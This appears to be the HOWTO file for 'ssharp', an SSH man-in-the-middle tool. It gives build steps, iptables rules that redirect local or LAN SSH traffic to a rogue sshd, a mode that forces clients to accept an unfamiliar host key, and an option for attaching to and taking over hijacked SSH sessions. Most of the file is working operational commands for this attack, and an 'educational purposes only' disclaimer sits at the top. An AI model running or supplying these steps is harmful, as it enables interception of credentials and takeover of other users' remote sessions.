blob: 33f1e6e9ab5342f1c13604458e2a4d041cb99901 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
|
HOWTO
=====
1.
Think! Only YOU are responsible for your own actions.
Ssharp is provided 'AS IS' without any warranty.
It is for educational and demonstration purposes only.
The author is not responsible for any damage you might cause
when using it.
Ssharp is NOT for free distribution. It is derived from
a BSD-like licensed software and you are NOT allowed to
distribute it.
2.
Prefered prefix is /usr/local.
(Edit ssharp.h to fit your OS and paths if needed)
# configure; make ssh; make
# make install
3.
# cp ssh /usr/local/bin/ssharpclient (or whatever your path is)
(Assuming you already have a sshd package installed; make sure
ssharp can find its hostkeys etc.)
Disable RSA authentication.
4.
For localhost testing:
# iptables -t nat -A OUTPUT -p tcp --sport 1000:5000 --dport 22 -j REDIRECT\
--to-port 10000
For in-LAN testing:
# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 10000 -i eth0
# <redirect-magic> :)
(maybe you need to specify different portranges if ssh clients come
from src-port 30000+X)
5.
# ./sshd -4 -p 10000
6.
Return to coding.
If you want to use the SSH2-only MiM, add -7 switch to line seen at 5:
# ./sshd -4 -p 10000 -7
This will make sshd look which key (DSA or RSA) the client probably does
not already have and will force it to use.
If you have still some spare time, you may have a look at ssh-walk script.
If having even more spare time you may want to compile ssharp with
USE_MSS option and install the mss server and client into /usr/local/bin.
Then ssharp will slip the session through a screen-like terminal
which allows you to attach to hijacked SSH sessions. mss-server will
create /tmp/ssharp-IP.PID socket which can be used as argument for
mss-client. If PID is killed and someone attached to the mss-server
before the legitimate client is killed and you own the session as
the only one. TAKE CARE TO STAY LEGAL!!!
mss can be found at http://stealth.7350.org/
In urgent cases I may be reached through stealth@segfault.net.
Stealth
|
